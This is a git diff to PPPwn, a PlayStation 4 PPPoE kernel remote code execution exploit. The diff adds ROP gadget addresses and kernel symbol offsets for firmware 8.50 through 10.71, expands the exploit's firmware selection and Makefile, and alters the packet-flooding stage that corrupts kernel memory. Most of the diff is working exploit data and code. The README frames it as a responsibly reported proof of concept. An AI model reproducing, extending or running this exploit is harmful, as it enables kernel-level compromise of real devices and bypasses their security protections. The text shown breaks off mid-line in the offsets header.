diff --git a/README.md b/README.md index 41dd2304..1b69b7a3 100644 --- a/README.md +++ b/README.md @@ -1,15 +1,20 @@ # PPPwn - PlayStation 4 PPPoE RCE -PPPwn is a kernel remote code execution exploit for PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for [CVE-2006-4304](https://hackerone.com/reports/2177925) that was reported responsibly to PlayStation. +PPPwn is a kernel remote code execution exploit for PlayStation 4 up to FW 11.00. This is a proof-of-concept exploit for [CVE-2006-4304](https://hackerone.com/reports/2177925) that was reported responsibly to PlayStation. Supported versions are: +- FW 8.50 - FW 9.00 +- FW 9.03 / 9.04 +- FW 9.50 / 9.60 +- FW 10.00 / 10.01 +- FW 10.50 / 10.70 / 10.71 - FW 11.00 - more can be added (PRs are welcome) The exploit only prints `PPPwned` on your PS4 as a proof-of-concept. In order to launch Mira or similar homebrew enablers, the `stage2.bin` payload needs to be adapted. ## Requirements -- Computer with Ethernet port +- A computer with an Ethernet port - USB adapter also works - Ethernet cable - Linux @@ -22,6 +27,8 @@ The exploit only prints `PPPwned` on your PS4 as a proof-of-concept. In order to - has code for loading payloads from a USB (WIP) - Big thanks to ps4debug for the utils +**Note:** Before you compile, copy `payload/payload.bin` to `stage2/` folder. + ## Usage On your computer, clone the repository: @@ -64,7 +71,7 @@ On your PS4: - Go to `Settings` and then `Network` - Select `Set Up Internet connection` and choose `Use a LAN Cable` - Choose `Custom` setup and choose `PPPoE` for `IP Address Settings` -- Enter anything for `PPPoE User ID` and `PPPoE Pasword` +- Enter anything for `PPPoE User ID` and `PPPoE Password` - Choose `Automatic` for `DNS Settings` and `MTU Settings` - Choose `Do Not Use` for `Proxy Server` - Click `Test Internet Connection` to communicate with your computer @@ -159,7 +166,7 @@ If the exploit works, you should see an output similar to below, and you should ``` ## Notes for Mac Apple Silicon Users (arm64 / aarch64) -The code will not compile on Apple Silicon and requires amd64 architecture. +The code will not compile on Apple Silicon and requires AMD64 architecture. There is a workaround using docker which will build the bin files required. Clone this repository to your mac system, then from the repo folder run `./build-macarm.sh`.This will build the binaries for PS4 FW 1100 and place the necessary files into the correct folders. To build the binaries for a different version, i.e. 900, run the command as such: `./build-macarm.sh 900`. Once built, copy this folder structure into the Linux VM and execute as instructed above. This has been tested using VMware Fusion 13.5.1, with the VM Guest as Ubuntu 24.04, and the host machine is MacOS 14.4.1 diff --git a/offsets.py b/offsets.py index 2f999d31..0a04b80b 100644 --- a/offsets.py +++ b/offsets.py @@ -3,6 +3,99 @@ # This software may be modified and distributed under the terms # of the MIT license. See the LICENSE file for details. +# FW 8.50 +class OffsetsFirmware_850: + PPPOE_SOFTC_LIST = 0xffffffff83dd6018 + + KERNEL_MAP = 0xffffffff83e64228 + + SETIDT = 0xffffffff82467340 + + KMEM_ALLOC = 0xffffffff824199a0 + KMEM_ALLOC_PATCH1 = 0xffffffff82419a6c + KMEM_ALLOC_PATCH2 = 0xffffffff82419a74 + + MEMCPY = 0xffffffff825a40f0 + + # 0xffffffff823ce849 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret + MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823ce849 + + SECOND_GADGET_OFF = 0x3b + + # 0xffffffff8237e09d : jmp qword ptr [rsi + 0x3b] + FIRST_GADGET = 0xffffffff8237e09d + + # 0xffffffff82c766e6 : push rbp ; jmp qword ptr [rsi] + PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c766e6 + + # 0xffffffff822a3a31 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] + POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822a3a31 + + # 0xffffffff829261c6 : lea rsp, [rsi + 0x20] ; repz ret + LEA_RSP_RSI_20_REPZ_RET = 0xffffffff829261c6 + + # 0xffffffff826d2a8a : add rsp, 0x28 ; pop rbp ; ret + ADD_RSP_28_POP_RBP_RET = 0xffffffff826d2a8a + + # 0xffffffff82439c6f : add rsp, 0xb0 ; pop rbp ; ret + ADD_RSP_B0_POP_RBP_RET = 0xffffffff82439c6f + + # 0xffffffff822008e0 : ret + RET = 0xffffffff822008e0 + + # 0xffffffff825dc87d : pop rdi ; ret + POP_RDI_RET = 0xffffffff825dc87d + + # 0xffffffff823882c9 : pop rsi ; ret + POP_RSI_RET = 0xffffffff823882c9 + + # 0xffffffff8232eec2 : pop rdx ; ret + POP_RDX_RET = 0xffffffff8232eec2 + + # 0xffffffff82246d0c : pop rcx ; ret + POP_RCX_RET = 0xffffffff82246d0c + + # 0xffffffff8237cd26 : pop r8 ; pop rbp ; ret + POP_R8_POP_RBP_RET = 0xffffffff8237cd26 + + # 0xffffffff827a366f : pop r12 ; ret + POP_R12_RET = 0xffffffff827a366f + + # 0xffffffff82202d74 : pop rax ; ret + POP_RAX_RET = 0xffffffff82202d74 + + # 0xffffffff822008df : pop rbp ; ret + POP_RBP_RET = 0xffffffff822008df + + # 0xffffffff82bb5866 : push rsp ; pop rsi ; ret + PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5866 + + # 0xffffffff82444180 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax + MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82444180 + + # 0xffffffff82b73476 : mov byte ptr [rcx], al ; ret + MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b73476 + + # 0xffffffff8220fbbc : mov rdi, rbx ; call r12 + MOV_RDI_RBX_CALL_R12 = 0xffffffff8220fbbc + + # 0xffffffff8220f9f7 : mov rdi, r14 ; call r12 + MOV_RDI_R14_CALL_R12 = 0xffffffff8220f9f7 + + # 0xffffffff8253628e : mov rsi, rbx ; call rax + MOV_RSI_RBX_CALL_RAX = 0xffffffff8253628e + + # 0xffffffff825bb768 : mov r14, rax ; call r8 + MOV_R14_RAX_CALL_R8 = 0xffffffff825bb768 + + # 0xffffffff82cb68da : add rdi, rcx ; ret + ADD_RDI_RCX_RET = 0xffffffff82cb68da + + # 0xffffffff82346e67 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret + SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82346e67 + + # 0xffffffff82b845c7 : jmp r14 + JMP_R14 = 0xffffffff82b845c7 # FW 9.00 class OffsetsFirmware_900: @@ -18,6 +111,7 @@ class OffsetsFirmware_900: MEMCPY = 0xffffffff824714b0 + # 0xffffffff823fb949 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949 SECOND_GADGET_OFF = 0x3d @@ -97,6 +191,380 @@ class OffsetsFirmware_900: # 0xffffffff82b85693 : jmp r14 JMP_R14 = 0xffffffff82b85693 +# FW 9.50 / 9.60 +class OffsetsFirmware_950_960: + PPPOE_SOFTC_LIST = 0xffffffff8434c0a8 + + KERNEL_MAP = 0xffffffff84347830 + + SETIDT = 0xffffffff8254d320 + + KMEM_ALLOC = 0xffffffff823889d0 + KMEM_ALLOC_PATCH1 = 0xffffffff82388a9c + KMEM_ALLOC_PATCH2 = 0xffffffff82388aa4 + + MEMCPY = 0xffffffff82401cc0 + + MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff822bea79 + + SECOND_GADGET_OFF = 0x3b + + # 0xffffffff822c53cd : jmp qword ptr [rsi + 0x3b] + FIRST_GADGET = 0xffffffff822c53cd + + # 0xffffffff82c6ec06 : push rbp ; jmp qword ptr [rsi] + PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c6ec06 + + # 0xffffffff822bf041 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] + POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822bf041 + + # 0xffffffff82935fc6 : lea rsp, [rsi + 0x20] ; repz ret + LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82935fc6 + + # 0xffffffff826adfda : add rsp, 0x28 ; pop rbp ; ret + ADD_RSP_28_POP_RBP_RET = 0xffffffff826adfda + + # 0xffffffff82584c1f : add rsp, 0xb0 ; pop rbp ; ret + ADD_RSP_B0_POP_RBP_RET = 0xffffffff82584c1f + + # 0xffffffff822008e0 : ret + RET = 0xffffffff822008e0 + + # 0xffffffff82315161 : pop rdi ; ret + POP_RDI_RET = 0xffffffff82315161 + + # 0xffffffff822dd859 : pop rsi ; ret + POP_RSI_RET = 0xffffffff822dd859 + + # 0xffffffff822cad55 : pop rdx ; ret + POP_RDX_RET = 0xffffffff822cad55 + + # 0xffffffff8222d707 : pop rcx ; ret + POP_RCX_RET = 0xffffffff8222d707 + + # 0xffffffff8220fec7 : pop r8 ; pop rbp ; ret + POP_R8_POP_RBP_RET = 0xffffffff8220fec7 + + # 0xffffffff8279f14f : pop r12 ; ret + POP_R12_RET = 0xffffffff8279f14f + + # 0xffffffff8223a7fe : pop rax ; ret + POP_RAX_RET = 0xffffffff8223a7fe + + # 0xffffffff822008df : pop rbp ; ret + POP_RBP_RET = 0xffffffff822008df + + # 0xffffffff82bad912 : push rsp ; pop rsi ; ret + PUSH_RSP_POP_RSI_RET = 0xffffffff82bad912 + + # 0xffffffff8235fea0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax + MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8235fea0 + + # 0xffffffff824f2458 : mov byte ptr [rcx], al ; ret + MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff824f2458 + + # 0xffffffff822524dc : mov rdi, rbx ; call r12 + MOV_RDI_RBX_CALL_R12 = 0xffffffff822524dc + + # 0xffffffff82252317 : mov rdi, r14 ; call r12 + MOV_RDI_R14_CALL_R12 = 0xffffffff82252317 + + # 0xffffffff824a07ae : mov rsi, rbx ; call rax + MOV_RSI_RBX_CALL_RAX = 0xffffffff824a07ae + + # 0xffffffff82567228 : mov r14, rax ; call r8 + MOV_R14_RAX_CALL_R8 = 0xffffffff82567228 + + # 0xffffffff82caedfa : add rdi, rcx ; ret + ADD_RDI_RCX_RET = 0xffffffff82caedfa + + # 0xffffffff82333437 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret + SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82333437 + + # 0xffffffff82b7c6e7 : jmp r14 + JMP_R14 = 0xffffffff82b7c6e7 + +# FW 10.50 / 10.70 / 10.71 +class OffsetsFirmware_1050_1071: + PPPOE_SOFTC_LIST = 0xffffffff844514b8 + + KERNEL_MAP = 0xffffffff844a9250 + + SETIDT = 0xffffffff82341470 + + KMEM_ALLOC = 0xffffffff82628960 + KMEM_ALLOC_PATCH1 = 0xffffffff82628a2c + KMEM_ALLOC_PATCH2 = 0xffffffff82628a34 + + MEMCPY = 0xffffffff822d7370 + + MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82285f39 + + SECOND_GADGET_OFF = 0x3b + + # 0xffffffff8221cb8d : jmp qword ptr [rsi + 0x3b] + FIRST_GADGET = 0xffffffff8221cb8d + + # 0xffffffff82c74cd6 : push rbp ; jmp qword ptr [rsi] + PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c74cd6 + + # 0xffffffff824a4981 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] + POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff824a4981 + + # 0xffffffff82921206 : lea rsp, [rsi + 0x20] ; repz ret + LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82921206 + + # 0xffffffff826c493a : add rsp, 0x28 ; pop rbp ; ret + ADD_RSP_28_POP_RBP_RET = 0xffffffff826c493a + + # 0xffffffff822ce1af : add rsp, 0xb0 ; pop rbp ; ret + ADD_RSP_B0_POP_RBP_RET = 0xffffffff822ce1af + + # 0xffffffff822008e0 : ret + RET = 0xffffffff822008e0 + + # 0xffffffff8236f38f : pop rdi ; ret + POP_RDI_RET = 0xffffffff8236f38f + + # 0xffffffff82222d59 : pop rsi ; ret + POP_RSI_RET = 0xffffffff82222d59 + + # 0xffffffff82329bb2 : pop rdx ; ret + POP_RDX_RET = 0xffffffff82329bb2 + + # 0xffffffff8225a567 : pop rcx ; ret + POP_RCX_RET = 0xffffffff8225a567 + + # 0xffffffff822234fd : pop r8 ; pop rbp ; ret + POP_R8_POP_RBP_RET = 0xffffffff822234fd + + # 0xffffffff827aa3ef : pop r12 ; ret + POP_R12_RET = 0xffffffff827aa3ef + + # 0xffffffff82495c08 : pop rax ; ret + POP_RAX_RET = 0xffffffff82495c08 + + # 0xffffffff822008df : pop rbp ; ret + POP_RBP_RET = 0xffffffff822008df + + # 0xffffffff82bb5092 : push rsp ; pop rsi ; ret + PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5092 + + # 0xffffffff8256d4d0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax + MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8256d4d0 + + # 0xffffffff822a9078 : mov byte ptr [rcx], al ; ret + MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff822a9078 + + # 0xffffffff8229113c : mov rdi, rbx ; call r12 + MOV_RDI_RBX_CALL_R12 = 0xffffffff8229113c + + # 0xffffffff82290f77 : mov rdi, r14 ; call r12 + MOV_RDI_R14_CALL_R12 = 0xffffffff82290f77 + + # 0xffffffff8227e3ce : mov rsi, rbx ; call rax + MOV_RSI_RBX_CALL_RAX = 0xffffffff8227e3ce + + # 0xffffffff824f95e8 : mov r14, rax ; call r8 + MOV_R14_RAX_CALL_R8 = 0xffffffff824f95e8 + + # 0xffffffff82cb4eca : add rdi, rcx ; ret + ADD_RDI_RCX_RET = 0xffffffff82cb4eca + + # 0xffffffff8220c1e7 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret + SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8220c1e7 + + # 0xffffffff82b83a5b : jmp r14 + JMP_R14 = 0xffffffff82b83a5b + +# FW 9.03/9.04 +class OffsetsFirmware_903_904: + PPPOE_SOFTC_LIST = 0xffffffff843e99f8 + + KERNEL_MAP = 0xffffffff84464d48 + SETIDT = 0xffffffff825128e0 + + KMEM_ALLOC = 0xffffffff8257a070 + KMEM_ALLOC_PATCH1 = 0xffffffff8257a13c + KMEM_ALLOC_PATCH2 = 0xffffffff8257a144 + + MEMCPY = 0xffffffff82471130 + + # 0xffffffff823fb679 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret + MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb679 + + SECOND_GADGET_OFF = 0x3d + + # 0xffffffff829e686f : jmp qword ptr [rsi + 0x3d] + FIRST_GADGET = 0xffffffff829e686f + + # 0xffffffff82c74566 : push rbp ; jmp qword ptr [rsi] + PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c74566 + + # 0xffffffff822b4151 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] + POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822b4151 + + # 0xffffffff8293fe06 : lea rsp, [rsi + 0x20] ; repz ret + LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293fe06 + + # 0xffffffff826c31aa : add rsp, 0x28 ; pop rbp ; ret + ADD_RSP_28_POP_RBP_RET = 0xffffffff826c31aa + + # 0xffffffff8251ad2f : add rsp, 0xb0 ; pop rbp ; ret + ADD_RSP_B0_POP_RBP_RET = 0xffffffff8251ad2f + + # 0xffffffff822008e0 : ret + RET = 0xffffffff822008e0 + + # 0xffffffff8238e75d : pop rdi ; ret + POP_RDI_RET = 0xffffffff8238e75d + + # 0xffffffff822aad39 : pop rsi ; ret + POP_RSI_RET = 0xffffffff822aad39 + + # 0xffffffff8244cc56 : pop rdx ; ret + POP_RDX_RET = 0xffffffff8244cc56 + + # 0xffffffff822445e7 : pop rcx ; ret + POP_RCX_RET = 0xffffffff822445e7 + + # 0xffffffff822ab4dd : pop r8 ; pop rbp ; ret + POP_R8_POP_RBP_RET = 0xffffffff822ab4dd + + # 0xffffffff8279d9cf : pop r12 ; ret + POP_R12_RET = 0xffffffff8279d9cf + + # 0xffffffff82234ec8 : pop rax ; ret + POP_RAX_RET = 0xffffffff82234ec8 + + # 0xffffffff822008df : pop rbp ; ret + POP_RBP_RET = 0xffffffff822008df + + # 0xffffffff82bb479a : push rsp ; pop rsi ; ret + PUSH_RSP_POP_RSI_RET = 0xffffffff82bb479a + + # 0xffffffff82244ed0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax + MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82244ed0 + + # 0xffffffff825386d8 : mov byte ptr [rcx], al ; ret + MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff825386d8 + + # 0xffffffff82630b0c : mov rdi, rbx ; call r12 + MOV_RDI_RBX_CALL_R12 = 0xffffffff82630b0c + + # 0xffffffff8235b337 : mov rdi, r14 ; call r12 + MOV_RDI_R14_CALL_R12 = 0xffffffff8235b337 + + # 0xffffffff822e3d2e : mov rsi, rbx ; call rax + MOV_RSI_RBX_CALL_RAX = 0xffffffff822e3d2e + + # 0xffffffff823638c8 : mov r14, rax ; call r8 + MOV_R14_RAX_CALL_R8 = 0xffffffff823638c8 + + # 0xffffffff82cb475a : add rdi, rcx ; ret + ADD_RDI_RCX_RET = 0xffffffff82cb475a + + # 0xffffffff82409287 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret + SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82409287 + + # 0xffffffff82b835b3 : jmp r14 + JMP_R14 = 0xffffffff82b835b3 + + +# FW 10.00/10.01 +class OffsetsFirmware_1000_1001: + PPPOE_SOFTC_LIST = 0xffffffff8446d920 + + KERNEL_MAP = 0xffffffff8447bef8 + + SETIDT = 0xffffffff8227b460 + + KMEM_ALLOC = 0xffffffff8253b040 + KMEM_ALLOC_PATCH1 = 0xffffffff8253b10c + KMEM_ALLOC_PATCH2 = 0xffffffff8253b114 + + MEMCPY = 0xffffffff82672d20 + + # 0xffffffff82376089 : mov cr0 rsi ; ud2 ; mov eax 1; ret + MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82376089 + + SECOND_GADGET_OFF = 0x3b + + # 0xffffffff82249c5d : jmp qword ptr [rsi + 0x3b] + FIRST_GADGET = 0xffffffff82249c5d + + # 0xffffffff82c73946 : push rbp ; jmp qword ptr [rsi] + PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c73946 + + # 0xffffffff82545741 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] + POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82545741 + + # 0xffffffff8292b346 : lea rsp, [rsi + 0x20] ; repz ret + LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8292b346 + + # 0xffffffff826d0d0a : add rsp, 0x28 ; pop rbp ; ret + ADD_RSP_28_POP_RBP_RET = 0xffffffff826d0d0a + + # 0xffffffff82531c3f : add rsp, 0xb0 ; pop rbp ; ret + ADD_RSP_B0_POP_RBP_RET = 0xffffffff82531c3f + + # 0xffffffff822008e0 : ret + RET = 0xffffffff822008e0 + + # 0xffffffff82510c4e : pop rdi ; ret + POP_RDI_RET = 0xffffffff82510c4e + + # 0xffffffff822983e0 : pop rsi ; ret + POP_RSI_RET = 0xffffffff822983e0 + + # 0xffffffff824029b2 : pop rdx ; ret + POP_RDX_RET = 0xffffffff824029b2 + + # 0xffffffff822983ba : pop rcx ; ret + POP_RCX_RET = 0xffffffff822983ba + + # 0xffffffff8237dd7d : pop r8 ; pop rbp ; ret + POP_R8_POP_RBP_RET = 0xffffffff8237dd7d + + # 0xffffffff827b32ef : pop r12 ; ret + POP_R12_RET = 0xffffffff827b32ef + + # 0xffffffff8229974f : pop rax ; ret + POP_RAX_RET = 0xffffffff8229974f + + # 0xffffffff822008df : pop rbp ; ret + POP_RBP_RET = 0xffffffff822008df + + # 0xffffffff82bb3ee6 : push rsp ; pop rsi ; ret + PUSH_RSP_POP_RSI_RET = 0xffffffff82bb3ee6 + + # 0xffffffff8256bfb0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax + MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8256bfb0 + + # 0xffffffff824f0448 : mov byte ptr [rcx], al ; ret + MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff824f0448 + + # 0xffffffff8236bbec : mov rdi, rbx ; call r12 + MOV_RDI_RBX_CALL_R12 = 0xffffffff8236bbec + + # 0xffffffff8236ba27 : mov rdi, r14 ; call r12 + MOV_RDI_R14_CALL_R12 = 0xffffffff8236ba27 + + # 0xffffffff823f501e : mov rsi, rbx ; call rax + MOV_RSI_RBX_CALL_RAX = 0xffffffff823f501e + + # 0xffffffff8259e638 : mov r14, rax ; call r8 + MOV_R14_RAX_CALL_R8 = 0xffffffff8259e638 + + # 0xffffffff82cb3b3a : add rdi, rcx ; ret + ADD_RDI_RCX_RET = 0xffffffff82cb3b3a + + # 0xffffffff822bfa87 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret + SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff822bfa87 + + # 0xffffffff8280346f : jmp r14 + JMP_R14 = 0xffffffff8280346f + # FW 11.00 class OffsetsFirmware_1100: @@ -112,6 +580,7 @@ class OffsetsFirmware_1100: MEMCPY = 0xffffffff824dddf0 + # 0xffffffff824f1299 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299 SECOND_GADGET_OFF = 0x3e @@ -189,4 +658,4 @@ class OffsetsFirmware_1100: SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8260f297 # 0xffffffff82b84657 : jmp r14 - JMP_R14 = 0xffffffff82b84657 + JMP_R14 = 0xffffffff82b84657 \ No newline at end of file diff --git a/pppwn.py b/pppwn.py index 0c9c6b3f..9f82ce0b 100644 --- a/pppwn.py +++ b/pppwn.py @@ -655,9 +655,9 @@ def run(self): print('') print('[+] STAGE 1: Memory corruption') - # Use an invalid proto enum to trigger a printf in the kernel. For - # some reason, this causes scheduling on CPU 0 at some point, which - # makes the next allocation use the same per-CPU cache. + # Send invalid packet to trigger a printf in the kernel. For some + # reason, this causes scheduling on CPU 0 at some point, which makes + # the next allocation use the same per-CPU cache. for i in range(self.PIN_NUM): if i % 0x100 == 0: print('[*] Pinning to CPU 0...{}%'.format(100 * i // @@ -668,15 +668,13 @@ def run(self): self.s.send( Ether(src=self.source_mac, dst=self.target_mac, - type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / - PPP(proto=0x4141)) - self.s.recv() - sleep(0.0005) + type=ETHERTYPE_PPPOE)) + sleep(0.001) print('[+] Pinning to CPU 0...done') # LCP fails sometimes without the wait - sleep(0.5) + sleep(1) # Corrupt in6_llentry object overflow_lle = self.build_overflow_lle() @@ -820,7 +818,12 @@ def run(self): def main(): parser = ArgumentParser('pppwn.py') parser.add_argument('--interface', required=True) - parser.add_argument('--fw', choices=['900', '1100'], default='1100') + parser.add_argument('--fw', + choices=[ + '850', '900', '903', '904', '950', '960', '1000', + '1001', '1050', '1070', '1071', '1100' + ], + default='1100') parser.add_argument('--stage1', default='stage1/stage1.bin') parser.add_argument('--stage2', default='stage2/stage2.bin') args = parser.parse_args() @@ -834,8 +837,18 @@ def main(): with open(args.stage2, mode='rb') as f: stage2 = f.read() - if args.fw == '900': + if args.fw == '850': + offs = OffsetsFirmware_850() + elif args.fw == '900': offs = OffsetsFirmware_900() + elif args.fw in ('903', '904'): + offs = OffsetsFirmware_903_904() + elif args.fw in ('950', '960'): + offs = OffsetsFirmware_950_960() + elif args.fw in ('1000', '1001'): + offs = OffsetsFirmware_1000_1001() + elif args.fw in ('1050', '1070', '1071'): + offs = OffsetsFirmware_1050_1071() elif args.fw == '1100': offs = OffsetsFirmware_1100() diff --git a/stage1/Makefile b/stage1/Makefile index 9264e7ba..cfe483af 100644 --- a/stage1/Makefile +++ b/stage1/Makefile @@ -6,7 +6,7 @@ OBJCOPY = objcopy CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector LDFLAGS = -T linker.ld -nostartfiles -nostdlib -ifneq ($(filter $(FW), 900 1100),) +ifneq ($(filter $(FW), 850 900 903 904 950 960 1000 1001 1050 1070 1071 1100),) CFLAGS += -DFIRMWARE=$(FW) else $(error "Invalid firmware") diff --git a/stage1/offsets.h b/stage1/offsets.h index 607db1c3..99e0c6ad 100644 --- a/stage1/offsets.h +++ b/stage1/offsets.h @@ -8,7 +8,37 @@ #ifndef __OFFSETS_H__ #define __OFFSETS_H__ -#if FIRMWARE == 900 // FW 9.00 + +#if FIRMWARE == 850 // FW 8.50 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 // Identical to 9.00 + +#define kdlsym_addr_pppoe_softc_list 0xffffffff83dd6018 + +#define kdlsym_addr_cc_cpu 0xffffffff83dca4f0 +#define kdlsym_addr_callwheelsize 0xffffffff83dcc4f0 + +#define kdlsym_addr_nd6_llinfo_timer 0xffffffff822f9000 + +#define kdlsym_addr_Xill 0xffffffff8257e710 +#define kdlsym_addr_setidt 0xffffffff82467340 + +#define kdlsym_addr_kernel_map 0xffffffff83e64228 +#define kdlsym_addr_kmem_alloc 0xffffffff824199a0 + +#define kdlsym_addr_kproc_create 0xffffffff82210610 +#define kdlsym_addr_kproc_exit 0xffffffff82210880 + +#define kdlsym_addr_ksock_create 0xffffffff82331600 +#define kdlsym_addr_ksock_close 0xffffffff82331670 +#define kdlsym_addr_ksock_bind 0xffffffff82331680 +#define kdlsym_addr_ksock_recv 0xffffffff823319e0 + +#define kdlsym_addr_uart_patch 0xffffffff8373ae88 +#define kdlsym_addr_veri_patch 0xffffffff82824674 + + +#elif FIRMWARE == 900 // FW 9.00 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 @@ -36,6 +66,123 @@ #define kdlsym_addr_uart_patch 0xffffffff8372bf60 #define kdlsym_addr_veri_patch 0xffffffff82826874 + +#elif (FIRMWARE == 903 || FIRMWARE == 904) // FW 9.03/9.04 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 // Identical to 9.00 + +#define kdlsym_addr_pppoe_softc_list 0xffffffff843e99f8 + +#define kdlsym_addr_cc_cpu 0xffffffff843a9360 +#define kdlsym_addr_callwheelsize 0xffffffff843ab360 + +#define kdlsym_addr_nd6_llinfo_timer 0xffffffff822ad070 // Identical to 9.00 + +#define kdlsym_addr_Xill 0xffffffff8237d4b0 +#define kdlsym_addr_setidt 0xffffffff825128e0 + +#define kdlsym_addr_kernel_map 0xffffffff84464d48 +#define kdlsym_addr_kmem_alloc 0xffffffff8257a070 + +#define kdlsym_addr_kproc_create 0xffffffff822969e0 // Identical to 9.00 +#define kdlsym_addr_kproc_exit 0xffffffff82296c50 // Identical to 9.00 + +#define kdlsym_addr_ksock_create 0xffffffff82619c90 +#define kdlsym_addr_ksock_close 0xffffffff82619d00 +#define kdlsym_addr_ksock_bind 0xffffffff82619d10 +#define kdlsym_addr_ksock_recv 0xffffffff8261a070 + +#define kdlsym_addr_uart_patch 0xffffffff83727f60 +#define kdlsym_addr_veri_patch 0xffffffff82824834 + + +#elif (FIRMWARE == 950 || FIRMWARE == 960) // FW 9.50 / 9.60 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 + +#define kdlsym_addr_pppoe_softc_list 0xffffffff8434c0a8 + +#define kdlsym_addr_cc_cpu 0xffffffff8441ad60 +#define kdlsym_addr_callwheelsize 0xffffffff8441cd60 + +#define kdlsym_addr_nd6_llinfo_timer 0xffffffff822044e0 + +#define kdlsym_addr_Xill 0xffffffff8261fae0 +#define kdlsym_addr_setidt 0xffffffff8254d320 + +#define kdlsym_addr_kernel_map 0xffffffff84347830 +#define kdlsym_addr_kmem_alloc 0xffffffff823889d0 + +#define kdlsym_addr_kproc_create 0xffffffff82654e30 +#define kdlsym_addr_kproc_exit 0xffffffff826550a0 + +#define kdlsym_addr_ksock_create 0xffffffff8261bac0 +#define kdlsym_addr_ksock_close 0xffffffff8261bb30 +#define kdlsym_addr_ksock_bind 0xffffffff8261bb40 +#define kdlsym_addr_ksock_recv 0xffffffff8261bea0 + +#define kdlsym_addr_uart_patch 0xffffffff83c50be0 +#define kdlsym_addr_veri_patch 0xffffffff82824ae4 + + +#elif (FIRMWARE == 1000 || FIRMWARE == 1001) // FW 10.00 / 10.01 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 + +#define kdlsym_addr_pppoe_softc_list 0xffffffff8446d920 + +#define kdlsym_addr_cc_cpu 0xffffffff844921b0 +#define kdlsym_addr_callwheelsize 0xffffffff844941b0 + +#define kdlsym_addr_nd6_llinfo_timer 0xffffffff82651780 + +#define kdlsym_addr_Xill 0xffffffff824d2370 +#define kdlsym_addr_setidt 0xffffffff8227b460 + +#define kdlsym_addr_kernel_map 0xffffffff8447bef8 +#define kdlsym_addr_kmem_alloc 0xffffffff8253b040 + +#define kdlsym_addr_kproc_create 0xffffffff82407d90 +#define kdlsym_addr_kproc_exit 0xffffffff82408000 + +#define kdlsym_addr_ksock_create 0xffffffff82406a10 +#define kdlsym_addr_ksock_close 0xffffffff82406a80 +#define kdlsym_addr_ksock_bind 0xffffffff82406a90 +#define kdlsym_addr_ksock_recv 0xffffffff82406df0 + +#define 